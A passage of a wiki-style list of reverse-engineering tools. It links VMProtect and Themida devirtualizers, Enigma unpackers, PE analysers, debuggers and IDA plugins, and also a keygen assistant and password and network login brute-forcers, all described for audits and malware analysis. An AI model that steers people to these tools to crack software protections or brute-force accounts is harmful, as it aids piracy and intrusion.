&lt;br /&gt;
*[https://git.back.engineering/vmp2/ vmp2] - Resources provided by Back Engineering Labs regarding VMProtect 2 Reverse Engineering (x64 PE Only).&lt;br /&gt;
*vmemu (VMProtect 2 Virtual Machine Handler Emulation)&lt;br /&gt;
*vmassembler (VMProtect 2 Virtual Instruction Assembler)&lt;br /&gt;
*vmprofiler (VMProtect 2 Virtual Machines Profiler Library)&lt;br /&gt;
*vmprofiler-cli (VMProtect 2 CLI Virtual Machine Information Displayer)&lt;br /&gt;
*vmhook (VMProtect 2 Virtual Machine Hooking Library)&lt;br /&gt;
*vmprofiler-qt (VMProtect 2 Qt Virtual Instruction Inspector)&lt;br /&gt;
*um-hook (VMProtect 2 Usermode Virtual Instruction Hook Demo)&lt;br /&gt;
*vmdevirt (VMProtect Devirtualization)&lt;br /&gt;
&lt;br /&gt;
======VMProtect 3======&lt;br /&gt;
&lt;br /&gt;
*[https://git.back.engineering/vmp3/ vmp3] - Resources provided by Back Engineering Labs regarding VMProtect 3 Reverse Engineering (x64 PE Only).&lt;br /&gt;
*vmdevirt (VMProtect 3 Static Devirtualization)&lt;br /&gt;
*vmprofiler (VMProtect 3 Virtual Machines Profiler Library)&lt;br /&gt;
*vmemu (VMProtect 3 Virtual Machine Handler Emulation)&lt;br /&gt;
&lt;br /&gt;
=====Code Virtualizer (Oreans Technologies)=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/pakt/decv devc] - ia s decompiler for Code Virtualizer 1.3.8 (Oreans).&lt;br /&gt;
*[https://gdtr.wordpress.com/2012/10/03/decv-a-decompiler-for-code-virtualizer-by-oreans/ decv] - [blog post] a decompiler for Code Virtualizer by Oreans.&lt;br /&gt;
*[https://github.com/67-6f-64/AntiOreans-CodeDevirtualizer AntiOreans-CodeDevirtualizer] - is a proof-of-concept devirtualization engine for Themida/Oreans-CodeDevirtualizer.&lt;br /&gt;
&lt;br /&gt;
=====Enigma Protector=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/mos9527/evbunpack evbunpack] - is a Enigma Virtual Box Unpacker. Supported versions: 11.00, 10.70, 9.70, and 7.80.&lt;br /&gt;
&lt;br /&gt;
======OllyDbg Scripts======&lt;br /&gt;
*[https://github.com/ThomasThelen/OllyDbg-Scripts/blob/master/Enigma/Enigma%20Protector%201.90%20-%203.xx%20Alternativ%20Unpacker%20v1.0.txt Enigma Protector 1.90–3.xx Unpacker]&lt;br /&gt;
*[https://github.com/ThomasThelen/OllyDbg-Scripts/blob/master/Enigma/Enigma%20Protector%204.xx%20VM%20API%20Fixer%20v0.5.0.txt Enigma Protector 4.xx VM API Fixer]&lt;br /&gt;
&lt;br /&gt;
=====Generic Code Virtualizer=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/jnraber/VirtualDeobfuscator VirtualDeobfuscator] - is a reverse engineering tool for virtualization wrappers.&lt;br /&gt;
&lt;br /&gt;
====Reverse Engineering Toolkit AIO====&lt;br /&gt;
=====Windows‑focused=====&lt;br /&gt;
*[https://github.com/Jakiboy/ReVens ReVens] - is a Windows-based Reverse Engineering Toolkit &amp;quot;All-In-One&amp;quot;, Built for Security (Malware analysis, Penetration testing) &amp;amp; Educational purposes.&lt;br /&gt;
*[https://github.com/mentebinaria/retoolkit retoolkit] - is a collection of tools you may like if you are interested in reverse engineering and/or malware analysis on x86 and x64 Windows systems.&lt;br /&gt;
*[https://github.com/byte2mov/re-kit-2.0 re-kit 2.0] - is a reverse engineering toolkit made for fighting malware and analyzing programs.&lt;br /&gt;
*[https://github.com/zer0condition/ReverseKit ReverseKit] - is a comprehensive toolkit designed to aid reverse engineers in the process of dynamic RE.&lt;br /&gt;
&lt;br /&gt;
=====Android‑focused=====&lt;br /&gt;
*[https://github.com/RevEngiSquad/revengi-app RevEngi] - is a all-in-one toolkit for reverse engineering: Smali Grammar, DexRepair, Flutter Analysis and much more...&lt;br /&gt;
&lt;br /&gt;
====Binary PE Analysis / Editor (Windows)====&lt;br /&gt;
&lt;br /&gt;
*[https://web.archive.org/web/20210331144912/https://protectionid.net/ ProtectionID] - Great little tool to scan a Windows binary payload for overlays and packers.  [[Media:ProtectionId.690.December.2017.zip]] [https://www.virustotal.com/gui/file/26c54eb376183d508ee129531728f9e01d30f0df29d7621f390e8f0ea6a1c79c/community VT link], pw: recessim.com&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/horsicq/Detect-It-Easy Detect-It-Easy] - abbreviated &amp;quot;DIE&amp;quot; is a program for determining types of files. &amp;quot;DIE&amp;quot; is a cross-platform application, apart from Windows version there are also available versions for Linux and Mac OS.&lt;br /&gt;
&lt;br /&gt;
*[https://www.mitec.cz/exe.html MiTeC Portable Executable Reader/Explorer] - is a tool that reads and displays executable file properties and structures. It is compatible with PE32 (Portable Executable), PE32+ (64bit), NE (Windows 3.x New Executable) and VxD (Windows 9x Virtual Device Driver) file types. .NET executables are supported too.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/ExeinfoASL/ASL ExeInfoPe] - is a tool that can detect packers, compilers, protectors, .NET obfuscators, PUA applications.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/hasherezade/pe-bear PE-bear] - is a Portable Executable reversing tool with a friendly GUI using the Capstone Engine and is Open Source!&lt;br /&gt;
&lt;br /&gt;
*[https://ntcore.com/?page_id=388 CFF Explorer] - is a PE editor called CFF Explorer and a process viewer with a lot of features.&lt;br /&gt;
&lt;br /&gt;
*[https://web.archive.org/web/20220331063153/http://www.rdgsoft.net/ RDG Packer Detector] - is a detector for packers, cryptors, compilers, installers.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/petoolse/petools/ PE Tools] - is a portable executable (PE) manipulation toolkit.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/zedxxx/rccextended RccExtended] - is a resource compiler and decompiler for Qt binaries (files with the .rcc extension).&lt;br /&gt;
&lt;br /&gt;
====Hex Editors====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/WerWolv/ImHex ImHex] - is a Hex Editor for Reverse Engineers, Programmers and people who value their retinas when working at 3 AM.&lt;br /&gt;
&lt;br /&gt;
*[https://mh-nexus.de/en/hxd/ HxD] - is a carefully designed and fast hex editor which, additionally to raw disk editing and modifying of main memory (RAM), handles files of any size.&lt;br /&gt;
&lt;br /&gt;
*[https://www.x-ways.net/winhex/ WinHex] - is in its core a universal hexadecimal editor, particularly helpful in the realm of computer forensics, data recovery, low-level data processing, and IT security.&lt;br /&gt;
&lt;br /&gt;
*[https://malcat.fr/index.html MalCat] - is a feature-rich hexadecimal editor / disassembler for Windows and Linux targeted to IT-security professionals. Inspect more than 40 binary file formats, dissassemble and decompile different CPU architectures, extract embedded files and scan for Yara signatures or anomalies in a fast and easy-to-use graphical interface.&lt;br /&gt;
&lt;br /&gt;
====Pattern Matching / Pattern Searching====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/VirusTotal/yara Yara] - is a pattern matching swiss knife in the IT Security Researchers branch.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/BurntSushi/ripgrep ripgrep (rg)] - is a line-oriented search tool that recursively searches the current directory for a regex pattern. By default, ripgrep will respect gitignore rules and automatically skip hidden files/directories and binary files.&lt;br /&gt;
&lt;br /&gt;
*[https://linux.die.net/man/1/grep grep] - searches the named input FILEs (or standard input if no files are named, or if a single hyphen-minus (-) is given as file name) for lines containing a match to the given PATTERN. By default, grep prints the matching lines.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/stefankueng/grepWin grepWin] -  is a simple yet powerful search and replace tool which can use regular expressions to do its job. This allows to do much more powerful searches and replaces.&lt;br /&gt;
&lt;br /&gt;
*[https://astrogrep.sourceforge.net/  AstroGrep] - is a Microsoft Windows grep utility. Grep is a UNIX command-line program which searches within files for keywords. AstroGrep supports regular expressions, versatile printing options, stores most recently used paths and has a &amp;quot;context&amp;quot; feature which is very nice for looking at source code.&lt;br /&gt;
&lt;br /&gt;
====Comparison Tools (Binary differences)====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/joxeankoret/diaphora Diaphora] - is the most advanced Free and Open Source program diffing tool.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/google/bindiff BinDiff] - is an open-source comparison tool for binary files to quickly find differences and similarities in disassembled code.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/clearbluejar/ghidriff Ghidriff] - is a command-line binary diffing tool that uses Ghidra to identify differences between two binaries.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/quarkslab/qbindiff QBinDiff] - is an experimental binary diffing tool addressing the diffing as a Network Alignement Quadratic Problem.&lt;br /&gt;
&lt;br /&gt;
*[https://book.rada.re/tools/radiff2/binary_diffing.html radiff2] - is a binary diffing utility that is part of the radare2 framework.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/bmaia/binwally binwally] - is a binary and directory tree comparison tool using Fuzzy Hashing concept (ssdeep).&lt;br /&gt;
&lt;br /&gt;
====IAT Reconstructors (Windows)====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/x64dbg/Scylla NtQuery Scylla] - is a Windows Portable Executable imports reconstructor Open Source and part of x64dbg.&lt;br /&gt;
&lt;br /&gt;
====Process Monitors (Windows)====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/winsiderss/systeminformer/ System Informer] - is a  free, powerful, multi-purpose tool that helps you monitor system resources, debug software and detect malware.&lt;br /&gt;
&lt;br /&gt;
*[https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer Process Explorer (by Microsoft Sysinternals)] - is an advanced system monitoring tool by Microsoft Sysinternals that provides detailed real-time information about running processes, including their dependencies, resource usage, and open handles or DLLs.&lt;br /&gt;
&lt;br /&gt;
*[https://docs.microsoft.com/en-us/sysinternals/downloads/procmon Process Monitor (by Microsoft Sysinternals)] - is a real-time monitoring tool by Microsoft Sysinternals that captures and displays detailed system activity related to file system, registry, process, and thread operations for advanced troubleshooting and diagnostics.&lt;br /&gt;
&lt;br /&gt;
====Process Dumpers (Windows)====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/glmcdona/Process-Dump Process Dump (pd)] - is a Windows reverse-engineering tool to dump malware memory components back to disk for analysis. It uses an aggressive import reconstruction approach to make analysis easier, and supports 32 and 64 bit modules. Dumping of regions without PE headers is supported and in these cases PE headers and import tables will automatically be generated.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/EquiFox/KsDumper KsDumper] - is a tool for dumping processes using the power of kernel space.&lt;br /&gt;
&lt;br /&gt;
====API monitoring ring3 (Windows)====&lt;br /&gt;
&lt;br /&gt;
*[http://jacquelin.potier.free.fr/winapioverride32/ WinAPIOverride] - is an advanced api monitoring software for 32 and 64 bits processes. You can monitor and/or override any function of a process.&lt;br /&gt;
&lt;br /&gt;
*[http://www.rohitab.com/apimonitor Rohitab API Monitor] - is a free tool that lets you monitor and control API calls made by applications and services. Its a powerful tool for seeing how applications and services work or for tracking down problems that you have in your own applications.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/hasherezade/tiny_tracer tiny_tracer] - is a Pin Tool for tracing API calls including parameters of selected functions, selected instructions RDTSC, CPUID, INT, inline system calls inc parameters of selected syscalls and more.&lt;br /&gt;
&lt;br /&gt;
====Hashing &amp;amp; Crypto====&lt;br /&gt;
These tools are used in authorized security audits to uncover flaws in hashing or cryptographic logic, as well as to detect backdoors or undocumented features. They are also commonly employed in crackme challenges to help improve reverse engineering skills.&amp;lt;br&amp;gt;&lt;br /&gt;
It includes support for a wide range of cryptographic algorithms and hash functions, such as AES, Blowfish, TEA family, RC2–RC6, Twofish, DES variants, MARS, and hashing standards like SHA-2, RIPEMD, TIGER, WHIRLPOOL, CRC variants, and HAVAL with multiple rounds and output lengths.&lt;br /&gt;
&lt;br /&gt;
*[https://webscene.ir/distro/AT4RE/Tools Keygener Assistant v2.1.2] [[File:Keygener Assistant v2.1.2.zip]] - is a tool that combines several functions to facilitate the task and save time during the analysis of an algorithm.&lt;br /&gt;
&lt;br /&gt;
*[https://webscene.ir/tools/show/SnD-Reverser-Tool-1.4 SnD Reverser Tool 1.4 (404)] [[File:SnD Reverser Tool 1.4.zip]] - is a cryptographic companion tool designed to support reverse engineering efforts, offering a wide range of features including hash function analysis, base conversions, and support for various encryption standards.&lt;br /&gt;
&lt;br /&gt;
====Password cracking====&lt;br /&gt;
Most embedded devices, whether connected via wireless or wired interfaces, store credentials such as local account passwords, service keys, and API keys. If you need to evaluate or audit the cryptographic mechanisms protecting these credentials, password-cracking tools are essential.&lt;br /&gt;
&lt;br /&gt;
Offline&lt;br /&gt;
*[https://github.com/hashcat/hashcat Hashcat] - is world's fastest and most advanced password recovery utility, supports many hash algorithms (MD5, SHA1, NTLM, bcrypt, etc).&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/openwall/john John the Ripper jumbo] - is a advanced offline password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs, GPUs, and even some FPGAs.&lt;br /&gt;
&lt;br /&gt;
Online (network based bruteforce in LAN).&lt;br /&gt;
*[https://github.com/vanhauser-thc/thc-hydra Hydra / THC Hydra] - is a parallelized network login cracker built into various operating systems like Kali Linux, Parrot and other major penetration testing environments. It was created as a proof of concept tool, for security researchers to demonstrate how easy it can be to crack logins.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/jmk-foofus/medusa Medusa] - is a speedy, parallel, and modular, login brute-forcer.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/lanjelot/patator Patator] - is a multi-purpose brute-forcer, with a modular design and a flexible usage. Also support various offline brute force methods like; unzip_pass, keystore_pass, umbraco_crack.&lt;br /&gt;
&lt;br /&gt;
====Virtualization technology (host isolation) or sandboxes====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/firecracker-microvm/firecracker Firecracker] - is an open source virtualization technology that is purpose-built for creating and managing secure, multi-tenant container and function-based services that provide serverless operational models.&lt;br /&gt;
&lt;br /&gt;
*[https://www.redhat.com/en/technologies/cloud-computing/openshift/virtualization Red Hat OpenShift Virtualization] - Red Hat® OpenShift® Virtualization, a feature of Red Hat OpenShift, allows IT teams to run virtual machines alongside containers on the same platform, simplifying management and improving time to production. &lt;br /&gt;
&lt;br /&gt;
*[https://xenproject.org/ Xen Project] - The Xen Project focuses on revolutionizing virtualization by providing a versatile and powerful hypervisor that addresses the evolving needs of diverse industries.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/sandboxie-plus/Sandboxie Sandboxie] - is a sandbox-based isolation software for 32-bit and 64-bit Windows NT-based operating systems. It creates a sandbox-like isolated operating environment in which applications can be run or installed without permanently modifying local &amp;amp; mapped drives or the Windows registry.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/kpcyrd/boxxy-rs boxxy-rs] - is a linkable sandbox explorer. &amp;quot;If you implement boundaries and nobody is around to push them, do they even exist?&amp;quot;. Have you ever wondered how your sandbox looks like from the inside? Tempted to test if you can escape it, if only you had a shell to give it a try?&lt;br /&gt;
&lt;br /&gt;
*[https://www.virtualbox.org/ Oracle VM VirtualBox] - is a powerful x86 and AMD64/Intel64 virtualization product for enterprise as well as home use. Not only is VirtualBox an extremely feature rich, high performance product for enterprise customers, it is also the only professional solution that is freely available as Open Source Software under the terms of the GNU General Public License (GPL) version 3.&lt;br /&gt;
&lt;br /&gt;
*[https://www.vmware.com/ VMware] - is a virtualization and cloud computing software provider based in Palo Alto, Calif.&lt;br /&gt;
&lt;br /&gt;
*[https://www.qemu.org/ QEMU] - A generic and open source machine emulator and virtualizer.&lt;br /&gt;
&lt;br /&gt;
*[https://linux-kvm.org/page/Main_Page KVM (for Kernel-based Virtual Machine)] - is a full virtualization solution for Linux on x86 hardware containing virtualization extensions (Intel VT or AMD-V). It consists of a loadable kernel module, kvm.ko, that provides the core virtualization infrastructure and a processor specific module, kvm-intel.ko or kvm-amd.ko.&lt;br /&gt;
&lt;br /&gt;
*[https://www.proxmox.com/en/proxmox-virtual-environment/overview Proxmox] - is a complete, open-source server management platform for enterprise virtualization. It tightly integrates the KVM hypervisor and Linux Containers (LXC), software-defined storage and networking functionality, on a single platform.&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Dynamic &amp;amp; Static Analysis (mostly '''unmanged''' binaries)====&lt;br /&gt;
&lt;br /&gt;
=====Interactive Disassemblers ('''static analysis''')=====&lt;br /&gt;
&lt;br /&gt;
*[https://binary.ninja/ Binary Ninja] - reverse-engineering platform that can disassemble a binary and display the disassembly in linear or graph views.&lt;br /&gt;
&lt;br /&gt;
::Binary Ninja Scripts/Plugins/Extension&lt;br /&gt;
:::*[https://github.com/ergrelet/themida-unmutate-bn themida-unmutate-bn] - a Binary Ninja plugin to deobfuscate Themida, WinLicense and Code Virtualizer 3.x's mutation-based obfuscation.&lt;br /&gt;
:::*[https://github.com/ergrelet/themida-spotter-bn themida-spotter-bn] - a Binary Ninja plugin to detect Themida, WinLicense and Code Virtualizer's obfuscated code locations.&lt;br /&gt;
&lt;br /&gt;
*[https://www.nsa.gov/resources/everyone/ghidra/ Ghidra] - Ghidra is an open source software reverse engineering (SRE) framework developed by NSA's [https://www.nsa.gov/what-we-do/research/ Research] Directorate for NSA's [https://www.nsa.gov/what-we-do/cybersecurity/ cybersecurity mission].&lt;br /&gt;
&lt;br /&gt;
::Ghidra Scripts/Plugins/Extension&lt;br /&gt;
:::*[https://github.com/AllsafeCyberSecurity/awesome-ghidra Scripts/Plugins/Extension] - A curated list of awesome Ghidra materials.&lt;br /&gt;
:::*[https://github.com/grayhatacademy/ghidra_scripts Arm &amp;amp; MIPS scripts] - ARM &amp;amp; MIPS ROP finder, Call Chain, Codatify, Fluorescence, Function Profiler, Leaf Blower, Local Cross Reference, and more.&lt;br /&gt;
:::*[https://github.com/DSecurity/efiSeek efiSeek] - is a tool that aids in identifying and analyzing EFI (Extensible Firmware Interface) binaries by locating key EFI structures and metadata within firmware images.&lt;br /&gt;
:::*Qt Framework&lt;br /&gt;
::::*[https://github.com/diommsantos/QtREAnalyzer/ QtREAnalyzer] - is a extension to reverse-engineer Qt binaries. Works only with Run-Time Type Information (RTTI) enabled &amp;amp; compiled with MSVC.&lt;br /&gt;
::::*[https://github.com/OSUSecLab/QtRE QtRE] - is a headless analyzer tailored for Qt binary analysis.&lt;br /&gt;
&lt;br /&gt;
*[https://www.hex-rays.com/products/ida/ IDA] - The IDA Disassembler and Debugger is an interactive, programmable, extensible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X.&lt;br /&gt;
&lt;br /&gt;
::IDA Scripts/Plugins/Extension&lt;br /&gt;
:::*[https://github.com/gdelugre/ida-arm-system-highlight IDA ARM] - This script will give you the list of ARM system instructions used in your IDA database. This is useful for locating specific low-level pieces of code (setting up the MMU, caches, fault handlers, etc.).&lt;br /&gt;
:::*[https://github.com/google/bindiff BinDiff] - is a Open Source comparison tool for binary files, that assists vulnerability researchers and engineers to quickly find differences and similarities in disassembled code.&lt;br /&gt;
:::*[https://www.keystone-engine.org/keypatch/ Keypatch] - A multi-architeture assembler for IDA. Keypatch allows you enter assembly instructions to directly patch the binary under analysis. Powered by Keystone engine.&lt;br /&gt;
:::*[https://github.com/onethawt/idastealth IDAStealth] - is a plugin which aims to hide the IDA debugger from most common anti-debugging techniques. The plugin is composed of two files, the plugin itself and a dll which is injected into the debugger as soon as the debugger attaches to the process.&lt;br /&gt;
:::*[https://github.com/iphelix/ida-sploiter ida-sploiter] - is a exploit development and vulnerability research tool. Some of the plugin's features include a powerful ROP gadgets search engine, semantic gadget analysis and filtering, interactive ROP chain builder, stack pivot analysis, writable function pointer search, cyclic memory pattern generation and offset analysis, detection of bad characters and memory holes, and many others.&lt;br /&gt;
:::*[https://github.com/danigargu/IDAtropy IDAtropy] -is a plugin for Hex-Ray's IDA Pro designed to generate charts of entropy and histograms using the power of idapython and matplotlib&lt;br /&gt;
:::*[https://github.com/grayhatacademy/ida/tree/master/plugins/localxrefs Localxrefs] - Finds references to any selected text from within the current function.&lt;br /&gt;
:::*[https://github.com/a1ext/labeless Labeless] - is a plugin system for dynamic, seamless and realtime synchronization between IDA Database and Olly. Labels, function names and global variables synchronization is supported. Olly and x64dbg are supported.&lt;br /&gt;
:::*[https://www.coresecurity.com/core-labs/open-source-tools/turbodiff-cs Turbodiff] - is a binary diffing tool developed as an IDA plugin. It discovers and analyzes differences between the functions of two binaries.&lt;br /&gt;
::::*Oreans CV scripts&lt;br /&gt;
:::::*[[Media:Oreans anti debug blacklist identifier.zip]] - [Python script] Oreans - Anti-Debugger Blacklist Identifier; Tested on 2.3.0.0 - 2.4.6.0.&lt;br /&gt;
:::::*[[Media:Oreans macro entry identifier biased.zip]] - [Python script] Oreans - Macro Entry Identifier (Biased); Tested on 2.3.0.0 - 3.0.8.0.&lt;br /&gt;
:::::*[[Media:Oreans macro entry identifier reversal.zip]] - [Python script] Oreans - Macro Entry Identifier (Reversal); Tested on 2.3.0.0 - 3.0.8.0.&lt;br /&gt;
:::*[https://github.com/onethawt/idaplugins-list A list of IDA Plugins PART1 (click here for more)] - A large list/collection of plugins for IDA.&lt;br /&gt;
:::*[https://github.com/vmallet/ida-plugins A list of IDA Plugins PART2 (click here for more)] - A large list/collection of plugins for IDA.&lt;br /&gt;
:::*[https://github.com/fr0gger/awesome-ida-x64-olly-plugin A list of IDA Plugins PART3 (click here for more)] - A large list/collection of plugins for IDA.&lt;br /&gt;
::IDA LLM Plugins&lt;br /&gt;
:::*Local (quantized LLMs Q4/INT4)&lt;br /&gt;
::::*[https://github.com/atredispartners/aidapal aiDAPal] - is an IDA Pro plugin that uses a locally running LLM that has been fine-tuned for Hex-Rays pseudocode to assist with code analysis.&lt;br /&gt;
::::*[https://github.com/0xdea/oneiromancer oneiromancer] - is a reverse engineering assistant that uses a locally running LLM to aid with pseudo-code analysis.&lt;br /&gt;
:::*Cloud&lt;br /&gt;
::::*[https://github.com/JusticeRage/Gepetto Gepetto] - is a Python plugin which uses various large language models to provide meaning to functions decompiled by IDA Pro (≥ 7.4). It can leverage them to explain what a function does, and to automatically rename its variables.&lt;br /&gt;
::::*[https://github.com/Antelcat/ida_copilot ida_copilot] - is a ChatGPT plugin for IDA Pro, where the cutting-edge capabilities of OpenAI's GPT models meet the powerful disassembly and debugging features of IDA Pro.&lt;br /&gt;
::::*[https://github.com/ke0z/VulChatGPT VulChatGPT] - is an plugin for Hex-Rays decompiler which integrates with the OpenAI API (ChatGPT) to assist in vulnerability discovery during reverse-engineering.&lt;br /&gt;
::::*[https://github.com/RevEngAI/reai-ida RevEng.AI] - is a plugin by RevEng.AI that integrates with their AI-driven analysis platform to let you upload binaries, fetch semantic summaries, auto‑rename functions based on similar binaries, sync analyses, and even perform AI‑based decompilation.&lt;br /&gt;
&lt;br /&gt;
*[https://codisec.com/veles/ Veles] - Open source tool for binary data analysis (No longer actively developed).&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/uxmal/reko Reko] - Reko is a binary decompiler for static analysis (ARM, x86-64, M68K, Aarch65, RISC-V and dotnet)&lt;br /&gt;
&lt;br /&gt;
*[https://rada.re/ radare2] and [https://rizin.re/ Rizin] - radare2 and its fork Rizin are open source reverse engineering frameworks. Both are primarily used through a shell-like text UI, but also offer GUIs called [https://rada.re/n/iaito.html iaito] and [https://cutter.re/ Cutter] respectively.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/rizinorg/cutter Cutter] - is a free and open-source reverse engineering platform powered by rizin. It aims at being an advanced and customizable reverse engineering platform while keeping the user experience in mind. Cutter is created by reverse engineers for reverse engineers.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/joelpx/plasma Plasma] - Plasma is an interactive disassembler for x86/ARM/MIPS. It can generates indented pseudo-code with colored syntax.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/wisk/medusa Medusa] - is a disassembler designed to be both modular and interactive. It runs on Windows and Linux, it should be the same on OSX.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/capstone-engine/capstone Capstone] - is a disassembly/disassembler framework for ARM, ARM64 (ARMv8), BPF, Ethereum VM, M68K, M680X, Mips, MOS65XX, PPC, RISC-V(rv32G/rv64G), SH, Sparc, SystemZ, TMS320C64X, TriCore, Webassembly, XCore and X86.&lt;br /&gt;
&lt;br /&gt;
=====Active Disassemblers or Debuggers ('''dynamic analysis''')=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/vivisect/vivisect Vivisect] - Vivisect binary analysis framework.  Includes Disassembler, Debugger, Emulation and Symbolik analysis engines.  Includes built-in Server and Shared-Workspace functionality.  Runs interactive or headless, programmable, extensible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X (Pure-Python, using ctypes to access underlying OS debug mechanism).  Supports RevSync via plugin, allowing basic collaboration with Binja, Ghidra, and IDA.  Criticisms (from a core dev): &amp;quot;Graph View could use some work, slower than Binja and IDA (due to Python), documentation like an OpenSource Project... but we keep working to make it better.  PR's and suggestions welcome.&amp;quot;  Best installed via Pip:  &amp;lt;code&amp;gt;python3 -m pip install vivisect&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*[https://www.immunityinc.com/products/debugger/ Immunity Debugger] - is a powerful new way to write exploits, analyze malware, and reverse engineer Windows binary files (python support)&lt;br /&gt;
&lt;br /&gt;
*[https://www.hopperapp.com/ Hopper] - Hopper can use LLDB or GDB, which lets you debug and analyze the binary in a dynamic way (only for Mac and Linux hosts, not for mobile devices).&lt;br /&gt;
&lt;br /&gt;
*[https://www.ollydbg.de/ OllyDbg] - is a powerful, user-friendly 32-bit Windows debugger focused on binary analysis, reverse engineering, and malware research, featuring dynamic code analysis and a rich plugin ecosystem.&lt;br /&gt;
&lt;br /&gt;
::OllyDbg Scripts/Plugins/Mods&lt;br /&gt;
:::*[https://github.com/ThomasThelen/OllyDbg-Scripts OllyDbg-Scripts] - is a curated list containing many older x86 OllyDbg scripts.&lt;br /&gt;
&lt;br /&gt;
*[https://x64dbg.com/ x64dbg] - Is a powerful Open Source Ollydbg replacement with a User Interface very similar to Ollydbg also x64dbg as the name states offers x64 support.&lt;br /&gt;
&lt;br /&gt;
::x64dbg Plugins/Integrations/Templates&lt;br /&gt;
:::*[https://github.com/x64dbg/x64dbg/wiki/Plugins x64dbg's Wiki] - is a wiki of Integrations and Plugins of x64dbg debugger.&lt;br /&gt;
:::*[[Media:Oreans oep finder uni.zip]] - OEP Finder python script (Universal=works for &amp;quot;all&amp;quot; versions); Tested on 2.3.0.0, 2.3.5.10, 3.0.8.0.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/mandiant/rvmi rVMI] - is a debugger on steroids. It leverages Virtual Machine Introspection (VMI) and memory forensics to provide full system analysis. This means that an analyst can inspect userspace processes, kernel drivers, and pre-boot environments in a single tool.&lt;br /&gt;
&lt;br /&gt;
*[https://www.sourceware.org/gdb/ GDB] - the GNU Project debugger, allows you to see what is going on `inside' another program while it executes, or what another program was doing at the moment it crashed.&lt;br /&gt;
&lt;br /&gt;
::GDB Plugins/Integrations/Templates&lt;br /&gt;
:::*[https://github.com/pwndbg/pwndbg pwndbg] - is a GDB plug-in that makes debugging with GDB suck less, with a focus on features needed by low-level software developers, hardware hackers, reverse-engineers and exploit developers.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/eteran/edb-debugger edb] - is a cross platform AArch32/x86/x86-64 debugger. It was inspired by Ollydbg, but aims to function on AArch32, x86, and x86-64 as well as multiple OS's.&lt;br /&gt;
&lt;br /&gt;
====Debugging and Profiling dynamic analysis (Linux)====&lt;br /&gt;
&lt;br /&gt;
*[https://valgrind.org/ Valgrind] - is a GPL'd system for debugging and profiling Linux programs. With Valgrind's tool suite you can automatically detect many memory management and threading bugs, avoiding hours of frustrating bug-hunting, making your programs more stable.&lt;br /&gt;
&lt;br /&gt;
*[https://libcsdbg.sourceforge.net/jTracer/ jTracer] - is a stack trace visualization utility for libcsdbg. In other words, it acts as a TCP/IP server for libcsdbg clients, that connect to it and transfer their trace data, either C++ exception stack traces or generic thread stack traces and whole process stack dumps.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/koute/bytehound Bytehound] - is a memory profiler tool for Linux designed to help developers analyze memory usage and find leaks in their applications.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/strace/strace strace] - is a diagnostic, debugging and instructional userspace utility for Linux.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/rr-debugger/rr rr Record and Replay Framework] - is a lightweight tool for recording, replaying and debugging execution of applications (trees of processes and threads). Debugging extends gdb with very efficient reverse-execution, which in combination with standard gdb/x86 features like hardware data watchpoints, makes debugging much more fun.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/lornix/fenris fenris] - is a program execution path analysis tool suitable for black-box code audits and algorithm analysis. It's useful for tracking down bugs and evaluating security subsystems.&lt;br /&gt;
&lt;br /&gt;
====Debuggers / Disassemblers / Decompilers for '''managed''' binaries====&lt;br /&gt;
&lt;br /&gt;
=====.NET (CLR)=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/dnSpyEx/dnSpy dnSpyEx (newly maintained repo &amp;amp; '''added features''')] - is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available.&lt;br /&gt;
*[https://github.com/dnSpy/dnSpy dnSpy (archived repo)]  - is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available.&lt;br /&gt;
*[https://github.com/icedland/iced Iced] - Blazing fast and correct x86/x64 disassembler, assembler, decoder, encoder for Rust, .NET, Java, Python, Lua.&lt;br /&gt;
*[https://github.com/icsharpcode/ILSpy ILSpy] - NET Decompiler with support for PDB generation, ReadyToRun, Metadata (&amp;amp;more) - cross-platform!&lt;br /&gt;
